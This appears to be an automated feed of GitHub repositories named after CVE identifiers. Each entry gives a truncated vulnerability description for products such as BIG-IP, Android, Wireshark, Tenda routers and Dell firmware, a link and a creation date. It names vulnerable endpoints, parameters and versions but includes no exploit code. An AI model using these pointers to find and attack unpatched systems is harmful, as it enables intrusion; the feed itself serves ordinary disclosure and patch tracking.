**An authentication vulnerability was discovered in Jira Service Management Server and Data Center which allows an attacker to impersonate another user and gain access to a Jira Service Management instance under certain circumstances_._ With write access to a User Directory and outgoing email enabled on a Jira Service Ma CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22501](https://github.com/Live-Hack-CVE/CVE-2023-22501) create time: 2023-02-01T21:28:54Z

**Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/fromSetWirelessRepeat. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24170](https://github.com/Live-Hack-CVE/CVE-2023-24170) create time: 2023-02-01T21:28:47Z

**Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/add_white_node. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24167](https://github.com/Live-Hack-CVE/CVE-2023-24167) create time: 2023-02-01T21:28:40Z

**Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/FUN_0007343c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24169](https://github.com/Live-Hack-CVE/CVE-2023-24169) create time: 2023-02-01T21:28:36Z

**Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/formWifiBasicSet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24166](https://github.com/Live-Hack-CVE/CVE-2023-24166) create time: 2023-02-01T21:28:25Z

**Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/initIpAddrInfo. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24165](https://github.com/Live-Hack-CVE/CVE-2023-24165) create time: 2023-02-01T21:28:10Z

**Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/FUN_000c2318. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24164](https://github.com/Live-Hack-CVE/CVE-2023-24164) create time: 2023-02-01T21:28:07Z

**GLPI is a Free Asset and IT Management Software package. Versions 10.0.0 and above, prior to 10.0.6 are vulnerable to Incorrect Authorization. This vulnerability allow unauthorized access to inventory files. Thus, if anonymous access to FAQ is allowed, inventory files are accessbile by unauthenticated users. This issue CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22500](https://github.com/Live-Hack-CVE/CVE-2023-22500) create time: 2023-02-01T21:27:45Z

**GLPI is a Free Asset and IT Management Software package. Versions prior to 10.0.6 are subject to Cross-site Scripting via malicious RSS feeds. An Administrator can import a malicious RSS feed that contains Cross Site Scripting (XSS) payloads inside RSS links. Victims who wish to visit an RSS content and click on the li CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22724](https://github.com/Live-Hack-CVE/CVE-2023-22724) create time: 2023-02-01T21:27:42Z

**GLPI is a Free Asset and IT Management Software package. Versions 9.4.0 and above, prior to 10.0.6 are subject to Cross-site Scripting. An attacker can persuade a victim into opening a URL containing a payload exploiting this vulnerability. After exploited, the attacker can make actions as the victim or exfiltrate sess CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22722](https://github.com/Live-Hack-CVE/CVE-2023-22722) create time: 2023-02-01T21:27:39Z

**IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 243161. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47983](https://github.com/Live-Hack-CVE/CVE-2022-47983) create time: 2023-02-01T20:18:29Z

**IBM App Connect Enterprise Certified Container 4.1, 4.2, 5.0, 5.1, 5.2, 6.0, 6.1, and 6.2 could disclose sensitive information to an attacker due to a weak hash of an API Key in the configuration. IBM X-Force ID: 241583. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43922](https://github.com/Live-Hack-CVE/CVE-2022-43922) create time: 2023-02-01T20:18:26Z

**On BIG-IP versions 17.0.x before 17.0.0.2 and 16.1.x before 16.1.3.3, and BIG-IP SPK starting in version 1.6.0, when a client-side HTTP/2 profile and the HTTP MRF Router option are enabled for a virtual server, undisclosed requests can cause an increase in memory resource utilization. Note: Software versions which have CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22664](https://github.com/Live-Hack-CVE/CVE-2023-22664) create time: 2023-02-01T20:19:18Z

**On F5OS-A beginning in version 1.2.0 to before 1.3.0 and F5OS-C beginning in version 1.3.0 to before 1.5.0, processing F5OS tenant file names may allow for command injection. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22657](https://github.com/Live-Hack-CVE/CVE-2023-22657) create time: 2023-02-01T20:19:14Z

**On BIG-IP versions 17.0.x before 17.0.0.2 and 16.1.x before 16.1.3.3, when a HTTP profile with the non-default Enforcement options of Enforce HTTP Compliance and Unknown Methods: Reject are configured on a virtual server, undisclosed requests can cause the Traffic Management Microkernel (TMM) to terminate. Note: Softwa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22422](https://github.com/Live-Hack-CVE/CVE-2023-22422) create time: 2023-02-01T20:19:11Z

**On versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.7, 14.1.x before 14.1.5.3, and all versions of 13.1.x, an open redirect vulnerability exists on virtual servers enabled with a BIG-IP APM access policy. This vulnerability allows an unauthenticated malicious attacker to build an open redirec CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22418](https://github.com/Live-Hack-CVE/CVE-2023-22418) create time: 2023-02-01T20:19:07Z

**In BIG-IP starting in versions 17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6, and 13.1.5 on their respective branches, a format string vulnerability exists in iControl SOAP that allows an authenticated attacker to crash the iControl SOAP CGI process or, potentially execute arbitrary code. In appliance mode BIG-IP, a successful CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22374](https://github.com/Live-Hack-CVE/CVE-2023-22374) create time: 2023-02-01T20:19:03Z

**In versions beginning with 7.2.2 to before 7.2.3.1, a DLL hijacking vulnerability exists in the BIG-IP Edge Client Windows Installer. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22358](https://github.com/Live-Hack-CVE/CVE-2023-22358) create time: 2023-02-01T20:19:00Z

**On version 14.1.x before 14.1.5.3, and all versions of 13.1.x, when the BIG-IP APM system is configured with all the following elements, undisclosed requests may cause the Traffic Management Microkernel (TMM) to terminate: * An OAuth Server that references an OAuth Provider * An OAuth profile with the Authorization End CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22341](https://github.com/Live-Hack-CVE/CVE-2023-22341) create time: 2023-02-01T20:18:56Z

**On BIG-IP versions 16.1.x before 16.1.3.3, 15.1.x before 15.1.8, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when a SIP profile is configured on a Message Routing type virtual server, undisclosed traffic can cause TMM to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are n CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22340](https://github.com/Live-Hack-CVE/CVE-2023-22340) create time: 2023-02-01T20:18:52Z

**In BIP-IP versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.8.1, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when OCSP authentication profile is configured on a virtual server, undisclosed requests can cause an increase in CPU resource utilization. Note: Software versions which have re CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22323](https://github.com/Live-Hack-CVE/CVE-2023-22323) create time: 2023-02-01T20:18:49Z

**In BIG-IP versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.8.1, 14.1.x before 14.1.5.3, and all versions of 13.1.x, and all versions of BIG-IQ 8.x and 7.1.x, incorrect permission assignment vulnerabilities exist in the iControl REST and TMOS shell (tmsh) dig command which may allow an authent CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22326](https://github.com/Live-Hack-CVE/CVE-2023-22326) create time: 2023-02-01T20:18:46Z

**In BIG-IP versions 17.0.x before 17.0.0.2, and 16.1.x beginning in 16.1.2.2 to before 16.1.3.3, when an HTTP profile is configured on a virtual server and conditions beyond the attacker’s control exist on the target pool member, undisclosed requests sent to the BIG-IP system can cause the Traffic Management Microkernel CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22302](https://github.com/Live-Hack-CVE/CVE-2023-22302) create time: 2023-02-01T20:18:42Z

**On versions beginning in 7.1.5 to before 7.2.3.1, a DLL hijacking vulnerability exists in the BIG-IP Edge Client for Windows. User interaction and administrative privileges are required to exploit this vulnerability because the victim user needs to run the executable on the system and the attacker requires administrati CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22283](https://github.com/Live-Hack-CVE/CVE-2023-22283) create time: 2023-02-01T20:18:38Z

**On versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.8, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when a BIG-IP AFM NAT policy with a destination NAT rule is configured on a FastL4 virtual server, undisclosed traffic can cause the Traffic Management Microkernel (TMM) to terminate. No CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22281](https://github.com/Live-Hack-CVE/CVE-2023-22281) create time: 2023-02-01T20:18:33Z

**In setMimeGroup of PackageManagerService.java, there is a possible crash loop due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Andro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20922](https://github.com/Live-Hack-CVE/CVE-2023-20922) create time: 2023-02-01T20:18:21Z

**In queue of UsbRequest.java, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android- CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20920](https://github.com/Live-Hack-CVE/CVE-2023-20920) create time: 2023-02-01T20:18:17Z

**In onPackageRemoved of AccessibilityManagerService.java, there is a possibility to automatically grant accessibility services due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVer CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20921](https://github.com/Live-Hack-CVE/CVE-2023-20921) create time: 2023-02-01T20:18:13Z

**In getMainActivityLaunchIntent of LauncherAppsService.java, there is a possible way to bypass the restrictions on starting activities from the background due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20916](https://github.com/Live-Hack-CVE/CVE-2023-20916) create time: 2023-02-01T20:18:08Z

**In getStringsForPrefix of Settings.java, there is a possible prevention of package uninstallation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20919](https://github.com/Live-Hack-CVE/CVE-2023-20919) create time: 2023-02-01T20:18:04Z

**LPAR2RRD ? 4.53 and ? 3.5 has arbitrary command injection on the application server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-4982](https://github.com/Live-Hack-CVE/CVE-2014-4982) create time: 2023-02-01T18:03:17Z

**Déjà Vu Crescendo Sales CRM has remote SQL Injection CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-4984](https://github.com/Live-Hack-CVE/CVE-2014-4984) create time: 2023-02-01T18:03:13Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malic CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3964](https://github.com/Live-Hack-CVE/CVE-2018-3964) create time: 2023-02-01T18:03:24Z

**Use after free in media picker in Google Chrome prior to 79.0.3945.88 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13767](https://github.com/Live-Hack-CVE/CVE-2019-13767) create time: 2023-02-01T18:03:55Z

**Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated attacker with access to event configuration to store malicious code on the server, which could later be triggered by a legitimate user resulting in code execution withi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10957](https://github.com/Live-Hack-CVE/CVE-2019-10957) create time: 2023-02-01T18:03:36Z

**On Ricoh SP C250DN 1.06 devices, a debug port can be used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14302](https://github.com/Live-Hack-CVE/CVE-2019-14302) create time: 2023-02-01T18:03:09Z

**Ricoh SP C250DN 1.06 devices have Incorrect Access Control (issue 1 of 2). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14301](https://github.com/Live-Hack-CVE/CVE-2019-14301) create time: 2023-02-01T18:03:02Z

**An issue was discovered in HFish 0.5.1. When a payload is inserted where the name is entered, XSS code is triggered when the administrator views the information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22327](https://github.com/Live-Hack-CVE/CVE-2020-22327) create time: 2023-02-01T18:03:29Z

**SQL Injection vulnerability in function getTableCreationQuery in CreateAddField.php in phpMyAdmin 5.x before 5.2.0 via the tbl_storage_engine or tbl_collation parameters to tbl_create.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22452](https://github.com/Live-Hack-CVE/CVE-2020-22452) create time: 2023-02-01T18:02:54Z

**All versions of the package smartctl are vulnerable to Command Injection via the info method due to improper input sanitization. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21810](https://github.com/Live-Hack-CVE/CVE-2022-21810) create time: 2023-02-01T18:04:11Z

**All versions of the package puppet-facter are vulnerable to Command Injection via the getFact function due to improper input sanitization. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25350](https://github.com/Live-Hack-CVE/CVE-2022-25350) create time: 2023-02-01T18:03:33Z

**All versions of the package serve-lite are vulnerable to Directory Traversal due to missing input sanitization or other checks and protections employed to the req.url passed as-is to path.join(). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21192](https://github.com/Live-Hack-CVE/CVE-2022-21192) create time: 2023-02-01T18:03:21Z

**A command injection vulnerability in the DDNS service configuration of Western Digital My Cloud OS 5 devices running firmware versions prior to 5.26.119 allows an attacker to execute code in the context of the root user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29843](https://github.com/Live-Hack-CVE/CVE-2022-29843) create time: 2023-02-01T18:03:05Z

**A vulnerability in the FTP service of Western Digital My Cloud OS 5 devices running firmware versions prior to 5.26.119 allows an attacker to read and write arbitrary files. This could lead to a full NAS compromise and would give remote execution capabilities to the attacker. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29844](https://github.com/Live-Hack-CVE/CVE-2022-29844) create time: 2023-02-01T18:02:58Z

**The vRealize Log Insight contains a broken access control vulnerability. An unauthenticated malicious actor can remotely inject code into sensitive files of an impacted appliance which can result in remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31704](https://github.com/Live-Hack-CVE/CVE-2022-31704) create time: 2023-02-01T18:02:50Z

**The vRealize Log Insight contains a Directory Traversal Vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31706](https://github.com/Live-Hack-CVE/CVE-2022-31706) create time: 2023-02-01T18:02:46Z

**vRealize Log Insight contains a deserialization vulnerability. An unauthenticated malicious actor can remotely trigger the deserialization of untrusted data which could result in a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31710](https://github.com/Live-Hack-CVE/CVE-2022-31710) create time: 2023-02-01T18:02:42Z

**no description** : [motikan2010/CVE-2023-23924](https://github.com/motikan2010/CVE-2023-23924) create time: 2023-02-01T18:21:23Z

**GNW dissector crash in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0416](https://github.com/Live-Hack-CVE/CVE-2023-0416) create time: 2023-02-01T18:04:07Z

**Memory leak in the NFS dissector in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0417](https://github.com/Live-Hack-CVE/CVE-2023-0417) create time: 2023-02-01T18:04:03Z

**iSCSI dissector crash in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0415](https://github.com/Live-Hack-CVE/CVE-2023-0415) create time: 2023-02-01T18:03:59Z

**Dissection engine bug in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0413](https://github.com/Live-Hack-CVE/CVE-2023-0413) create time: 2023-02-01T18:03:51Z

**Crash in the EAP dissector in Wireshark 4.0.0 to 4.0.2 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0414](https://github.com/Live-Hack-CVE/CVE-2023-0414) create time: 2023-02-01T18:03:47Z

**TIPC dissector crash in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0412](https://github.com/Live-Hack-CVE/CVE-2023-0412) create time: 2023-02-01T18:03:43Z

**Excessive loops in multiple dissectors in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0411](https://github.com/Live-Hack-CVE/CVE-2023-0411) create time: 2023-02-01T18:03:40Z

**no description** : [paulotrindadec/CVE-2019-9193](https://github.com/paulotrindadec/CVE-2019-9193) create time: 2023-02-01T16:41:15Z

**Last Yard 22.09.8-1 is vulnerable to Cross-origin resource sharing (CORS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47717](https://github.com/Live-Hack-CVE/CVE-2022-47717) create time: 2023-02-01T15:51:56Z

**In Last Yard 22.09.8-1, the cookie can be stolen via via unencrypted traffic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47715](https://github.com/Live-Hack-CVE/CVE-2022-47715) create time: 2023-02-01T15:51:52Z

**Last Yard 22.09.8-1 does not enforce HSTS headers CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47714](https://github.com/Live-Hack-CVE/CVE-2022-47714) create time: 2023-02-01T15:51:48Z

**A vulnerability in the Remember Me function of Mura CMS before v10.0.580 allows attackers to bypass authentication via a crafted web request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47003](https://github.com/Live-Hack-CVE/CVE-2022-47003) create time: 2023-02-01T15:51:44Z

**A vulnerability in the Remember Me function of Masa CMS v7.2, 7.3, and 7.4-beta allows attackers to bypass authentication via a crafted web request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47002](https://github.com/Live-Hack-CVE/CVE-2022-47002) create time: 2023-02-01T15:51:40Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41151](https://github.com/Live-Hack-CVE/CVE-2022-41151) create time: 2023-02-01T15:51:37Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42378](https://github.com/Live-Hack-CVE/CVE-2022-42378) create time: 2023-02-01T15:51:30Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42380](https://github.com/Live-Hack-CVE/CVE-2022-42380) create time: 2023-02-01T15:51:25Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42382](https://github.com/Live-Hack-CVE/CVE-2022-42382) create time: 2023-02-01T15:51:22Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42381](https://github.com/Live-Hack-CVE/CVE-2022-42381) create time: 2023-02-01T15:51:18Z

**This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. Craf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42384](https://github.com/Live-Hack-CVE/CVE-2022-42384) create time: 2023-02-01T15:51:13Z

**This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. Craf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42383](https://github.com/Live-Hack-CVE/CVE-2022-42383) create time: 2023-02-01T15:51:09Z

**Dell PowerScale OneFS 9.0.0.x - 9.4.0.x contain an insertion of sensitive information into log file vulnerability in platform API of IPMI module. A low-privileged user with permission to read logs on the cluster could potentially exploit this vulnerability, leading to Information disclosure and denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22574](https://github.com/Live-Hack-CVE/CVE-2023-22574) create time: 2023-02-01T15:52:15Z

**Dell PowerScale OneFS 9.0.0.x-9.4.0.x contain an insertion of sensitive information into log file vulnerability in cloudpool. A low privileged local attacker could potentially exploit this vulnerability, leading to sensitive information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22573](https://github.com/Live-Hack-CVE/CVE-2023-22573) create time: 2023-02-01T15:52:11Z

**A vulnerability has been found in TRENDnet TEW-811DRU 1.0.10.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /wireless/security.asp of the component httpd. The manipulation of the argument device_web_ip leads to memory corruption. The attack can be launched remotely. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0613](https://github.com/Live-Hack-CVE/CVE-2023-0613) create time: 2023-02-01T15:52:07Z

**A vulnerability, which was classified as critical, was found in TRENDnet TEW-811DRU 1.0.10.0. Affected is an unknown function of the file /wireless/basic.asp of the component httpd. The manipulation of the argument device_web_ip leads to buffer overflow. It is possible to launch the attack remotely. The exploit has bee CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0612](https://github.com/Live-Hack-CVE/CVE-2023-0612) create time: 2023-02-01T15:52:03Z

**A vulnerability, which was classified as critical, has been found in TRENDnet TEW-652BRP 3.04B01. This issue affects some unknown processing of the file get_set.ccp of the component Web Management Interface. The manipulation leads to command injection. The attack may be initiated remotely. The exploit has been disclose CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0611](https://github.com/Live-Hack-CVE/CVE-2023-0611) create time: 2023-02-01T15:51:59Z

**Improper Authorization in GitHub repository wallabag/wallabag prior to 2.5.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0610](https://github.com/Live-Hack-CVE/CVE-2023-0610) create time: 2023-02-01T13:37:35Z

**Improper Authorization in GitHub repository wallabag/wallabag prior to 2.5.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0609](https://github.com/Live-Hack-CVE/CVE-2023-0609) create time: 2023-02-01T13:37:30Z

**sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 - Privilege escalation with sudo and sudoedit** : [g1vi/CVE-2010-0426](https://github.com/g1vi/CVE-2010-0426) create time: 2023-02-01T11:39:17Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate is unused by its CNA. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14395](https://github.com/Live-Hack-CVE/CVE-2020-14395) create time: 2023-02-01T11:23:07Z

**Potential security vulnerabilities have been identified in the BIOS (UEFI Firmware) for certain HP PC products, which might allow arbitrary code execution. HP is releasing firmware updates to mitigate these potential vulnerabilities. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3808](https://github.com/Live-Hack-CVE/CVE-2021-3808) create time: 2023-02-01T11:23:14Z

**Potential security vulnerabilities have been identified in the BIOS (UEFI Firmware) for certain HP PC products, which might allow arbitrary code execution. HP is releasing firmware updates to mitigate these potential vulnerabilities. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3809](https://github.com/Live-Hack-CVE/CVE-2021-3809) create time: 2023-02-01T11:23:11Z

**HP has identified a potential vulnerability in BIOS firmware of some Workstation products. Firmware updates are being released to mitigate these potential vulnerabilities. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3439](https://github.com/Live-Hack-CVE/CVE-2021-3439) create time: 2023-02-01T11:23:03Z

**Dell PowerScale OneFS 8.2.x, 9.0.0.x - 9.4.0.x, contain an insufficient resource pool vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46679](https://github.com/Live-Hack-CVE/CVE-2022-46679) create time: 2023-02-01T11:24:20Z

**Dell PowerScale OneFS, versions 8.2.x-9.4.x, contain a weak encoding for a NDMP password. A malicious and privileged local attacker could potentially exploit this vulnerability, leading to a full system compromise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45099](https://github.com/Live-Hack-CVE/CVE-2022-45099) create time: 2023-02-01T11:24:16Z

**Dell VxRail, versions prior to 7.0.410, contain a Container Escape Vulnerability. A local high-privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the container's underlying OS. Exploitation may lead to a system take over by an attacker. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46756](https://github.com/Live-Hack-CVE/CVE-2022-46756) create time: 2023-02-01T11:24:12Z

**Dell BIOS contains a Stack based buffer overflow vulnerability. A local authenticated attacker could potentially exploit this vulnerability by using an SMI to send larger than expected input to a parameter to gain arbitrary code execution in SMRAM. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34403](https://github.com/Live-Hack-CVE/CVE-2022-34403) create time: 2023-02-01T11:24:08Z

**Dell BIOS contains a Time-of-check Time-of-use vulnerability. A local authenticated malicious user could\u00a0potentially exploit this vulnerability by using a specifically timed DMA transaction during an SMI to gain arbitrary code execution on the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34398](https://github.com/Live-Hack-CVE/CVE-2022-34398) create time: 2023-02-01T11:24:05Z

**Dell PowerScale OneFS, versions 8.2.x-9.3.x, contains an Improper Certificate Validation vulnerability. An remote unauthenticated attacker could potentially exploit this vulnerability, leading to a full compromise of the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45100](https://github.com/Live-Hack-CVE/CVE-2022-45100) create time: 2023-02-01T11:24:01Z

**Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32482](https://github.com/Live-Hack-CVE/CVE-2022-32482) create time: 2023-02-01T11:23:57Z

**Dell PowerScale OneFS, 9.0.0.x-9.4.0.x, contain a cleartext storage of sensitive information vulnerability in S3 component. An authenticated local attacker could potentially exploit this vulnerability, leading to information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45098](https://github.com/Live-Hack-CVE/CVE-2022-45098) create time: 2023-02-01T11:23:54Z

**Dell OpenManage Server Administrator (OMSA) version 10.3.0.0 and earlier contains a DLL Injection Vulnerability. A local low privileged authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary executable on the operating system with elevated privileges. Exploitation may CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34396](https://github.com/Live-Hack-CVE/CVE-2022-34396) create time: 2023-02-01T11:23:50Z

**Dell EMC Data Protection Central, versions 19.1 through 19.7, contains a Host Header Injection vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability by injecting arbitrary \u2018Host\u2019 header values to poison a web cache or trigger redirections. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45102](https://github.com/Live-Hack-CVE/CVE-2022-45102) create time: 2023-02-01T11:23:47Z

